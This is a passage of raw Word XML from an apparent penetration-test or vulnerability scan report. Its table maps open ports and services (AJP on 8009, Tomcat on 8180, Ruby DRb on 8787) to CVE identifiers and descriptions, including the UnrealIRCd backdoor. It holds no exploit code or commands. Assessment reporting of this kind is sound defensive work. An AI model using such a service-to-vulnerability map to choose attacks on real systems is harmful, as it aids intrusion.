                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Buffer overflow in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>UnrealIRCd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3.2beta11 through 3.2.8, when </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>allow::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>options::</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>noident</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>is enabled, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unspecified vectors.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="488C990A" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="54D7ED59" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Contains an externally introduced modification (Trojan Horse) in the DEBUG3_DOLOG_SYSTEM macro, which allows remote attackers to execute arbitrary commands.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="01861839" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="330"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3194EA85" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="38F5B913" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>8009</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45C9CFB0" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ajp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-methods: Failed to get a valid response for the OPTION request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6A317F35" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ajp13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="07EA0028" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Apache </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Jserv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Protocol v1.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3714A139" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2008-5519,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D79E55E" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2020-1938</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="386122F0" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="1651AF9D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="330"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="105BFDAE" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="341FADD1" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>8180</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E5BF358" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>_http-favicon: Apache Tomcat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="689352F1" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|_http-server-header: Apache-Coyote/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76E1D325" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|_http-title: Apache Tomcat/5.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="506E2C59" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2DA8408E" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Apache Tomcat/Coyote JSP engine 1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2AC1427B" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2005-4836,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2011-1318</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="532039AE" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>allowLinking</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> is configured, which allows remote attackers to read JSP source files and obtain sensitive information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="0D39BE8F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="366"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="56CAE6FC" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="410C404B" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>8787</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0E0B428F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>drb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="61051C19" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Ruby </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>DRb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> RMI (Ruby 1.8; path /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/lib/ruby/1.8/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>drb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1C13D51C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2013-4073,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2008-1145</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3FE34779" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
